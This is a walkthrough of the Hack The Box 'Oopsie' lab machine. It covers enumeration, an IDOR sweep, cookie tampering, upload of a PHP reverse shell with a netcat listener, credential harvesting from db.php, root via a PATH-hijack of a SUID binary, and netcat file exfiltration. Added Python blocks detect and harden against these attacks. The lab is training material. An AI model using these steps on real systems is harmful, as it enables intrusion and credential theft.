# Oopsie Walkthrough

In our previous Archetype Walkthrough, I mentioned that the Starting Point machines are a series of 9 easy-rated machines that should be **rooted in sequence**. That means before you go through this box, you must have completed the [Archetype](https://shapmanasick.gitbook.io/starting-point-htb/archetype-walkthrough) machine.

Enough talk 🥱, let's start hacking. 🐱‍💻

{% hint style="danger" %}
**Disclaimer:** No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤
{% endhint %}

## 00. Start Machine …

To start the machine, just click "Join Machine".

![Start Oopsie Machine](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYOw5S7ox00Gt2rvuy0%2F-MYOxClGYTaSCnXicNFu%2Fimage.png?alt=media\&token=14fb2cd6-ef5d-46ee-a643-c8e7596da346)

Then you can see the **IP** address for that machine. Usually it is **10.10.10.28 🤠**

![10.10.10.28](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYOw5S7ox00Gt2rvuy0%2F-MYOxPZpJgEvdB-RsZLi%2Fimage.png?alt=media\&token=a07f54dd-582a-413a-bb2e-d6107b91428b)

Before going into the enumeration steps, we can simply ping the IP address to check our VPN connection and whether the machine is alive. Sometimes a machine's firewall will "disable" ping by dropping ICMP echo requests, but in most cases the ping will succeed!

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# ping 10.10.10.28 -c 2
PING 10.10.10.28 (10.10.10.28) 56(84) bytes of data.
64 bytes from 10.10.10.28: icmp_seq=1 ttl=63 time=268 ms
64 bytes from 10.10.10.28: icmp_seq=2 ttl=63 time=282 ms

--- 10.10.10.28 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 267.817/274.911/282.006/7.094 ms
```

The ping result shows TTL=63. There is one hop between us and the machine (the VPN), so the packet started with a TTL of 64, which is the Linux default. It is a Linux machine.

## 01. Enumeration First …

#### 01.1 Fast ports scan

As usual, run an Nmap fast scan over all TCP ports to identify which ports are open.

```bash
nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.28
```

```text
-n      : Never do DNS resolution
-vv     : Extra verbosity
--open  : Output only open ports
-p-     : Full TCP port range (1-65535)
-T4     : Aggressive (4) timing; assumes you are on a reasonably fast and reliable network
```

Here is the output 👇

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 05:28 EDT
Initiating Ping Scan at 05:28
Scanning 10.10.10.28 [4 ports]
Completed Ping Scan at 05:28, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 05:28
Scanning 10.10.10.28 [65535 ports]
Discovered open port 80/tcp on 10.10.10.28
Discovered open port 22/tcp on 10.10.10.28
SYN Stealth Scan Timing: About 31.38% done; ETC: 05:29 (0:01:08 remaining)
Completed SYN Stealth Scan at 05:30, 108.95s elapsed (65535 total ports)
Nmap scan report for 10.10.10.28
Host is up, received echo-reply ttl 63 (0.32s latency).
Scanned at 2021-04-16 05:28:18 EDT for 109s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63           * (Interesting)
80/tcp open  http    syn-ack ttl 63           * (Interesting)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 109.41 seconds
           Raw packets sent: 93007 (4.092MB) | Rcvd: 92692 (3.708MB)
```

Now we know which ports are open. The ones worth a closer look are marked **\* (Interesting)**.

#### 01.2 Run Nmap Scripting Engine

To get the best result we can run the `Nmap Scripting Engine` against the open ports. Since we already know which ports are open, we can point the script scan at just those ports and it will finish much faster.

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 22,80 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 05:33 EDT
Nmap scan report for 10.10.10.28
Host is up (0.39s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds
```

I have a trick to identify the operating system from the SSH version string. I got it from [IppSec's](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA/videos) walkthroughs. Thanks [IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA/videos) for your valuable walkthroughs 🙏. Here is the trick: if you see an SSH version like "**OpenSSH 7.6p1 Ubuntu 4ubuntu0.3**", just copy it and search for it on Google. In the search results you will find the domain launchpad.net. It contains some important details like the Ubuntu release, last update, publishing details and, most importantly, the builds. In this case it is Bionic.

![OpenSSH 7.6p1 Ubuntu 4ubuntu0.3](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYOw5S7ox00Gt2rvuy0%2F-MYP3cKhvCREBwKdc4VX%2Fimage.png?alt=media\&token=1555d463-f6b4-4b7f-8afd-980e04a22c41)

Now we know the operating system is Ubuntu and we have open ports 22 (SSH) and 80 (HTTP). Let's look at port 80 first.

#### 01.3 Discover more on port 80

Open a web browser and Burp Suite, then browse to <http://10.10.10.28/>

![http://10.10.10.28](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYP5fJx7X7SoEh5QUVx%2F-MYP7YLFszLT24tsMC9U%2Fimage.png?alt=media\&token=aecda6b4-f9fb-411a-9b34-6b5ba24a1cc4)

Here we get a nice landing page. First things first: view the page source and look for anything interesting. Unfortunately, nothing interesting is found there. Next we can look at the traffic in Burp.

![ Traffic on burp](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYP5fJx7X7SoEh5QUVx%2F-MYP8IEsm-asy_LbWO6a%2Fimage.png?alt=media\&token=e5268703-5842-4263-9ab9-ab3fe3e1db9c)

In here you can find an endpoint, so let's jump into it.

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYP5fJx7X7SoEh5QUVx%2F-MYP8eJ13Ft9HT6WbHcM%2Fimage.png?alt=media\&token=6f10aee5-2835-4668-938a-172434673e1e)

But I got nothing; it's just a blank page. Hmm, what about "<http://10.10.10.28/cdn-cgi/login/>"? Let's check...

![http://10.10.10.28/cdn-cgi/login/](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYP5fJx7X7SoEh5QUVx%2F-MYP8y3IclR-kQLa7xcz%2Fimage.png?alt=media\&token=abbfcd0a-832b-414e-9789-60e9dbb08b91)

It contains a login page. Let's try some basic default username/password pairs like:

* admin : admin
* admin : admin123
* admin : password
* admin : pa$$w0rd

Nothing worked. 😢 Oh wait, wait... Do you remember we got a password at the end of the Archetype machine? Try to remember, it was "**MEGACORP\_4dm1n!!**". Let's check this one as well.

`admin : MEGACORP_4dm1n!!`

![http://10.10.10.28/cdn-cgi/login/admin.php](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYP5fJx7X7SoEh5QUVx%2F-MYPA9zTpuyhVpXr8KD8%2Fimage.png?alt=media\&token=ff288c83-833c-46f7-8470-33b9d61a9350)

We got our admin panel, and now it's time to check the page source.

![view-source:http://10.10.10.28/cdn-cgi/login/admin.php](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPhbB-Fm0c88IOadpK%2Fimage.png?alt=media\&token=0c9f6fd5-c38e-4830-bc3e-4c81b7c99bac)

Here we have some interesting links. Let's check them one by one.

![http://10.10.10.28/cdn-cgi/login/admin.php?content=uploads](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPi6T6I7DMALK0oiEM%2Fimage.png?alt=media\&token=0e332481-4e94-41ba-9558-eaeaa8c5e999)

In the upload section they say "if you need to upload anything, please be a superadmin !". Hmm, ok, let's check the other ones.

![http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts\&id=1](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPiLxc_yFym-8Oba5v%2Fimage.png?alt=media\&token=5c9c8769-2f3e-4f88-80a9-e98783b59a79)

Oh! Now I smell an IDOR vulnerability, don't you? Let's check...

![IDOR in id=1](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPicZwSy2d0RZl5MAh%2Fimage.png?alt=media\&token=b4068d78-e774-4c4d-bc11-fbfec16654f7)

I sent this request to Burp Intruder and changed the settings as below 👇

![Intruder options - Payload Positions](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPjCuHNPHV0nbERb7y%2Fimage.png?alt=media\&token=6bbf461c-f43c-4a99-858b-634b73788b23)

![Intruder options - Payload Options ](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPjRL5SXrvj0aTB-f5%2Fimage.png?alt=media\&token=cc41cab9-353d-4a45-bb68-c9f6b4816bc7)

Let's start the attack.

![Attack Result Set](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPjyb1qQ1XoeO7UbEy%2Fimage.png?alt=media\&token=b7249a5a-8c00-41d6-82d4-9b95c49f78e3)

Above I sorted the results by length. There are more users, and now I have the super admin's Access ID and Email. So let's jump back to the upload section again, but this time we intercept the web traffic through the Burp proxy.

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPkyGOXE29s6ApSZgv%2Fimage.png?alt=media\&token=27e9fe8d-51f4-4b7d-a4ba-aed6de7831b3)

When you refresh the page you can see that the cookie contains something like a user id and a role. So let's alter those values to the super admin's and then forward the traffic.

{% hint style="info" %}
I did this using the match and replace feature in Burp. It is much quicker than intercepting and editing the requests one by one.
{% endhint %}

![Burp Match and Replace](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MZSLKf69aXcCTPDk-56%2F-MZSV2NztzdciPMgjQd5%2Fimage.png?alt=media\&token=3d609983-5e79-441f-869e-1c1bfbc4df7f)

## 02. Foothold

Let's jump to the upload page; now it is accessible.

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MZSt7UdnB1ieM7P581_%2F-MZSuR_Q0y8Wo26BwTQF%2Fimage.png?alt=media\&token=9e9655cc-363d-4163-addf-6d02a3e0505e)

Let's check whether we can upload a PHP web shell, or what kind of file type they expect to be uploaded. First copy the PHP reverse shell to our current directory.

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .
```

Then open `php-reverse-shell.php` in whatever text editor you like and make the changes below. 👇

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPnJgMY8asn9vjCbZC%2Fimage.png?alt=media\&token=f137daf7-cbb8-44f4-8d8f-3ad2763e42a8)

I renamed the file to `hiddenwiki.php`. Let's upload it.

{% hint style="info" %}
Note: You must change the cookie to the super admin's to upload the file. In my case it is replaced automatically by Burp's match and replace.
{% endhint %}

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPoirQUfrlfNRQYHib%2Fimage.png?alt=media\&token=f82a7666-303d-46b4-a79b-0ac398beaf51)

The file has been uploaded. Now we need to find where it is stored.

We have lots of fuzzing tools, but I personally love [Mauro Soria's](https://twitter.com/_maurosoria) [Dirsearch](https://github.com/maurosoria/dirsearch) tool. It has great output and you can customize the script because it is written in Python 3. For the wordlist I used [Daniel Miessler's](https://danielmiessler.com/) [SecLists](https://github.com/danielmiessler/SecLists).

Now fire up `dirsearch` and wait for the results.

```bash
dirsearch.py -u http://10.10.10.28/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
```

Early in the results we get a directory called `uploads`.

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# /opt/dirsearch/dirsearch.py -u http://10.10.10.28/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js, txt, xhtml | HTTP method: GET | Threads: 30 | Wordlist size: 560493

Error Log: /opt/dirsearch/logs/errors-21-04-16_09-31-10.log

Target: http://10.10.10.28/

Output File: /opt/dirsearch/reports/10.10.10.28/_21-04-16_09-31-11.txt

[09:31:11] Starting:
[09:31:16] 403 -  276B  - /js/     (Added to queue)
[09:31:16] 301 -  307B  - /js  ->  http://10.10.10.28/js/
[09:31:17] 403 -  276B  - /images/     (Added to queue)
[09:31:17] 403 -  276B  - /css/     (Added to queue)
[09:31:17] 301 -  308B  - /css  ->  http://10.10.10.28/css/
[09:31:18] 301 -  311B  - /images  ->  http://10.10.10.28/images/
[09:31:18] 301 -  311B  - /themes  ->  http://10.10.10.28/themes/     (Added to queue)
[09:31:18] 403 -  276B  - /themes/
[09:31:22] 301 -  312B  - /uploads  ->  http://10.10.10.28/uploads/     (Added to queue)
[09:31:22] 403 -  276B  - /uploads/
[09:31:37] 200 -   11KB - /index.php
[09:31:40] 403 -  276B  - /fonts/     (Added to queue)
[09:31:40] 301 -  310B  - /fonts  ->  http://10.10.10.28/fonts/
```
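Both the Intruder sweep over `admin.php?content=accounts&id=N` and the dirsearch run leave a very recognisable trace in the web server's access log. The following detection script is an added example, not part of the original writeup: it parses Apache combined-format log lines (the sample lines are constructed here, using the box's endpoint and the attacking VPN address as placeholders) and flags a client that requests many distinct account ids, or collects many 403/404 responses, inside a short sliding window.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log line: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# The IDOR endpoint seen on this box: accounts are selected by a numeric id.
ID_RE = re.compile(r'content=accounts&id=(\d+)')


def parse(line):
    """Return a dict with ip, timestamp, path and status, or None for a malformed line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec


def detect(lines, window_s=60, id_threshold=5, err_threshold=10):
    """Map each suspicious client ip to a list of findings.

    For every client, slide a window of `window_s` seconds over its requests and
    count (a) distinct account ids requested and (b) 403/404 responses.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            by_ip[rec['ip']].append(rec)
    findings = defaultdict(list)
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r['ts'])
        max_ids = max_errs = 0
        for i, first in enumerate(recs):
            window = [r for r in recs[i:] if (r['ts'] - first['ts']).total_seconds() <= window_s]
            ids = {m.group(1) for m in (ID_RE.search(r['path']) for r in window) if m}
            max_ids = max(max_ids, len(ids))
            max_errs = max(max_errs, sum(r['status'] in (403, 404) for r in window))
        if max_ids >= id_threshold:
            findings[ip].append(f'idor-sweep: {max_ids} distinct account ids in {window_s}s')
        if max_errs >= err_threshold:
            findings[ip].append(f'dir-bruteforce: {max_errs} 403/404 responses in {window_s}s')
    return dict(findings)


def sample_log():
    """Constructed log lines that mimic the Intruder sweep and the dirsearch burst."""
    fmt = '10.10.14.101 - - [16/Apr/2021:09:31:{sec:02d} +0000] "GET {path} HTTP/1.1" {status} 512'
    lines = [fmt.format(sec=i, path=f'/cdn-cgi/login/admin.php?content=accounts&id={i}', status=200)
             for i in range(1, 9)]
    words = ['js', 'images', 'css', 'themes', 'uploads', 'fonts', 'admin', 'backup', 'old', 'test', 'dev', 'x']
    lines += [fmt.format(sec=10 + i, path=f'/{w}', status=403 if i % 2 else 404) for i, w in enumerate(words)]
    # A normal visitor for contrast.
    lines.append('10.10.14.7 - - [16/Apr/2021:09:31:05 +0000] "GET /index.php HTTP/1.1" 200 11264')
    return lines
```

Running `detect(sample_log())` reports both patterns for 10.10.14.101 and nothing for the normal visitor; the thresholds are a starting point and should be tuned against the site's normal traffic.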

Now it's time to start a netcat listener, then use curl to request the uploaded file.

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nc -lvnp 4444
listening on [any] 4444 ...
```

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# curl http://10.10.10.28/uploads/hiddenwiki.php
```

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MYPAy_4MiWDii2x1cWn%2F-MYPtKtv-j_ezumqzw-m%2Fimage.png?alt=media\&token=89957345-bb85-4a7c-98c5-0e09b079c09a)

We land a shell as `www-data` and proceed to upgrade it. Type the command below to spawn a proper TTY 👇

```python
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.101] from (UNKNOWN) [10.10.10.28] 53294
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 12:18:36 up  5:32,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@oopsie:/$ pwd
pwd
/
www-data@oopsie:/$
```

First check the web directory, where there is some interesting information.

```text
www-data@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php  db.php  index.php  script.js
```

Here we find a `db.php` file in the `/var/www/html/cdn-cgi/login` directory. Let's view this file.

```text
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
```

Oh! Here we found new user credentials.

* robert:M3g4C0rpUs3r!

So let's switch to Robert's user with the password we found: `su robert`

```text
www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!

robert@oopsie:/var/www/html/cdn-cgi/login$
```

Yes, it works and now we are the robert user. We can view our user flag now. Let's check it and submit it to HTB.

```text
robert@oopsie:~$ cat user.txt
cat user.txt
f2c74*******************b7981
```

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MZSLKf69aXcCTPDk-56%2F-MZS_WfCWKdBihsrw6LC%2Fimage.png?alt=media\&token=62c0d25c-c93d-486a-9962-6d47a9048ba0)

## 03. Privilege Escalation

Now we are on the last step: we need to find the root flag.

Now we are robert. So again, look around the file system. First we can use the `id` command to see which groups we belong to. Let's check it.

```text
robert@oopsie:/$ id
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
```

From the result above we see that robert is part of the `bugtracker` group. Now let's check which files this group has access to.

```bash
find / -type f -group bugtracker 2> /dev/null
```

```text
robert@oopsie:/$ find / -type f -group bugtracker 2> /dev/null
find / -type f -group bugtracker 2> /dev/null
/usr/bin/bugtracker
```

There is a binary called `bugtracker`, and we also notice that it has the SUID bit set.

```text
robert@oopsie:/$ ls -l /usr/bin/bugtracker
ls -l /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker
```

{% hint style="info" %}
The 's' in the user 'execute' field means the binary runs as its owner, in this case root. 😋😋😎
{% endhint %}

Let's run the binary and see what it does.

```text
robert@oopsie:/$ /usr/bin/bugtracker
/usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 000
000
---------------

cat: /root/reports/000: No such file or directory
```

Nothing interesting so far. Let's use the `strings` command to analyze the binary for any hard-coded information.

```bash
strings /usr/bin/bugtracker
```

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MZSgSPKjNqQ-mEDVXhy%2F-MZSm7Bzu9545Lu_tpy8%2Fimage.png?alt=media\&token=3492faec-a9b4-4a47-b109-d707c51d24b4)

Looking through the output, you can see what looks like a system command that calls `cat` using a relative name instead of an absolute path. So what's on your mind now? Yes: we can create a malicious file called `cat` and modify PATH to include the current working directory. With that method we can abuse this misconfiguration and escalate our privileges to root.

Let's create the file, make it executable and add the current working directory to PATH.

```bash
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat
export PATH=/tmp:$PATH
```
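To make clear why the four commands above work, and what the binary's author should have done instead, here is an added example (not code from the box or the writeup): it emulates the shell's PATH lookup against a constructed filesystem, shows that a relative `cat` resolves to `/tmp/cat` once `/tmp` is at the front of PATH while an absolute `/bin/cat` ignores PATH entirely, and gives the environment reset a setuid program should apply before calling `system()`. `SAFE_PATH` is an assumed fixed value in the style of sudo's `secure_path`.

```python
import os

# Assumed fixed search path a privileged program should use instead of the caller's PATH.
SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve(cmd, path_env, exists):
    """Emulate how /bin/sh locates `cmd`: the first PATH entry containing it wins.

    `exists` is a predicate over candidate paths so the lookup can run against a
    constructed filesystem instead of the real one.
    """
    if "/" in cmd:                       # absolute (or explicit relative) path: PATH is not consulted
        return cmd if exists(cmd) else None
    for d in path_env.split(":"):
        candidate = os.path.join(d or ".", cmd)   # an empty entry means the current directory
        if exists(candidate):
            return candidate
    return None


def risky_entries(path_env, writable):
    """PATH entries a setuid program must not trust: relative ones, or ones the caller can write to."""
    return [d for d in path_env.split(":")
            if d in ("", ".") or not d.startswith("/") or writable(d)]


def harden_env(env):
    """Environment a setuid program should build before system()/popen(): PATH is replaced
    outright rather than filtered, and loader-influencing variables are dropped as defence in depth."""
    clean = dict(env)
    clean["PATH"] = SAFE_PATH
    for var in ("LD_PRELOAD", "LD_LIBRARY_PATH", "IFS"):
        clean.pop(var, None)
    return clean


def demo():
    """Constructed filesystem: a planted /tmp/cat next to the real /bin/cat."""
    fs = {"/tmp/cat", "/bin/cat", "/usr/bin/id"}
    attacker_path = "/tmp:/usr/bin:/bin"             # what `export PATH=/tmp:$PATH` produces
    writable = lambda d: d == "/tmp"                 # /tmp is world-writable on the box
    return {
        "hijacked": resolve("cat", attacker_path, fs.__contains__),       # /tmp/cat
        "with_safe_path": resolve("cat", SAFE_PATH, fs.__contains__),     # /bin/cat
        "absolute": resolve("/bin/cat", attacker_path, fs.__contains__),  # /bin/cat regardless of PATH
        "risky": risky_entries(attacker_path, writable),                  # ['/tmp']
        "hardened_path": harden_env({"PATH": attacker_path, "LD_PRELOAD": "/tmp/x.so"})["PATH"],
    }
```

Either fix on its own closes this particular hole: calling `/bin/cat` by absolute path, or resetting PATH before the call; doing both is the usual recommendation for setuid code.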

Now let's run the `/usr/bin/bugtracker` binary again.

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MZSgSPKjNqQ-mEDVXhy%2F-MZSoGcsrdEUcsi2kygI%2Fimage.png?alt=media\&token=c710b183-2f75-4ea4-8855-4b7905933303)

Now we land as root. The last step: let's read the root flag and submit it to HTB.

{% hint style="info" %}
Here I was unable to view the root.txt flag using the cat, vi or nano commands, so instead of viewing the flag I'm going to use netcat and transfer the file to my host.
{% endhint %}

-- On the receiving end (my host)

```bash
nc -l -p 7878 > root.txt
```

-- On the sending end (Oopsie machine)

```bash
nc -w 3 destination-ip 7878 < root.txt
```

Here is the output 👇

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MZSgSPKjNqQ-mEDVXhy%2F-MZSqZMhm8zpgeK59JPJ%2Fimage.png?alt=media\&token=bf82a97c-bc94-4e7b-8525-25dec17d3247)

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-M_zGCOg1MYatPO0WCiZ%2F-M_zGq025IY1qjfNHF90%2Fimage.png?alt=media\&token=6cd73024-5c0a-4e0c-836f-267cb5b639be)

## 04. Post Exploitation

Inside root's home folder we see a `.config` folder, which contains a `FileZilla` config file with the credentials `ftpuser : mc@F1l3ZilL4` visible in plain text.

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MZSgSPKjNqQ-mEDVXhy%2F-MZSsvtvqgwhajtXUWLn%2Fimage.png?alt=media\&token=0e664297-35ce-478f-b933-ebe4d17c9c3f)

That's all for now! Keep in mind that some of the info collected (like credentials, folders...) can be useful in the next 7 labs of the 'Starting Point' path. Thanks for reading and happy hacking!

**Find me on** [@twitter](https://twitter.com/ShapManasick)
